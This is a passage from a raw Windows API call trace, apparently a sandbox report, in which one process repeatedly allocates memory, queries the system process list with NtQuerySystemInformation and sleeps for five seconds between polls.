RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.960] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.965] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.967] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.967] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.968] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.968] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.974] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.975] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.975] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.976] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.980] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.981] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.982] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.982] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.983] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.983] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.989] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.990] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.990] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.991] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0239.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0239.997] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0239.998] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0239.998] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0239.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0239.999] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0239.999] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.003] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.003] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.010] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.012] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.017] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.019] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.020] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.020] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.024] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.025] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.049] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.054] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.057] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.058] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.065] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.065] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.065] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.066] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.069] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.070] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.073] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.092] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.093] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.102] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.102] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.104] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.104] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.104] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.111] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.113] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.127] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.133] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.133] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0240.136] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0240.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0240.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0240.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0240.141] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0240.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0240.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 